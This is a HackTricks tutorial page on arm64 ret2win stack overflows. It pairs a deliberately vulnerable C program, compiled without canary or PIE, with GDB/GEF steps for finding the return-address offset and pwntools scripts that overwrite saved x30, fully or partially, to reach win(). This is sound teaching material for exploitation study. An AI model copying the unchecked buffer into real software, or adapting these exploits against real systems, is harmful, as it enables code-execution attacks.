Ret2win - arm64
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Find an introduction to arm64 in:
{{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}
Code
```c
#include <stdio.h>
#include <unistd.h>

void win() {
    printf("Congratulations!\n");
}

void vulnerable_function() {
    char buffer[64];
    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability: up to 256 bytes into a 64-byte buffer
}

int main() {
    vulnerable_function();
    return 0;
}
```
Compile without PIE and without a stack canary:
```bash
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
```
Finding the offset
Pattern option
This example was created using GEF:
Start gdb with GEF, create a pattern and feed it to the binary:
```bash
gdb -q ./ret2win
pattern create 200
run
```
![](../../../images/image (1205).png)
arm64 will try to return to the address held in register x30 (which was overwritten), so we can use that value to find the offset of the pattern:
```bash
pattern search $x30
```
![](../../../images/image (1206).png)
The offset is 72 (0x48).
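How the `pattern create` / `pattern search` step works under the hood, as an added example that is not part of the original page, GEF or pwntools: a de Bruijn cyclic pattern generator and offset lookup in plain Python, plus a model of this page's frame (64-byte buffer, saved x29, then saved x30) showing why the search answers 72. The frame layout constants and the simulated x30 value are assumptions made for the demonstration.

```python
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"  # alphabet that pwntools/GEF patterns use by default


def de_bruijn(alphabet: bytes, n: int):
    """Yield a de Bruijn sequence B(k, n): every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """Equivalent of `pattern create <length>`: the first `length` bytes of the sequence."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(value, length: int = 200, n: int = 4) -> int:
    """Equivalent of `pattern search <value>`: offset of the window inside the pattern, or -1.
    An int is treated as a little-endian 64-bit register value such as $x30."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    return cyclic(length, n).find(value[:n])


def simulated_x30_offset() -> int:
    """Assumed frame model from this page: 64-byte buffer, 8-byte saved x29, then saved x30.
    Returns the offset the pattern search recovers for the overwritten x30."""
    buffer_size, saved_fp = 64, 8
    pattern = cyclic(200)                  # what `pattern create 200` feeds into read()
    lr_start = buffer_size + saved_fp      # saved x30 sits right after the saved x29
    x30 = int.from_bytes(pattern[lr_start:lr_start + 8], "little")  # value ret would use
    return cyclic_find(x30)


if __name__ == "__main__":
    print(cyclic(200))
    print("offset:", simulated_x30_offset())  # 72 == 0x48
```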
Stack offset option
Start by getting the stack address where the pc register is stored:
```bash
gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame
```
![](../../../images/image (1207).png)
Now set a breakpoint after the read(), continue until the read() has executed, and enter a pattern such as 13371337:
```bash
b *vulnerable_function+28
c
```
![](../../../images/image (1208).png)
Find where this pattern is stored in memory:
![](../../../images/image (1209).png)
Then: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72
![](../../../images/image (1210).png)
No PIE
Regular
Get the address of the win function:
```bash
objdump -d ret2win | grep win
ret2win: file format elf64-littleaarch64
00000000004006c4 <win>:
```
Exploit:
```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()
```
![](../../../images/image (1211).png)
Off-by-1
In practice this will be more like an off-by-2 on the PC saved on the stack. Instead of overwriting the whole return address, we overwrite only its last 2 bytes with 0x06c4.
```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()
```
![](../../../images/image (1212).png)
You can find another off-by-one example on ARM64 at https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, which is a real off-by-one in a fictitious vulnerability.
With PIE
tip
Compile the binary without the -no-pie argument
Off-by-2
Without a leak we don't know the exact address of the win function, but we can know the function's offset within the binary, and since the return address we are overwriting already points to a nearby address, it is possible to use the offset of the win function (0x7d4 in this case) and overwrite just that part:
![](../../../images/image (1213).png)
```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x07d4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()
```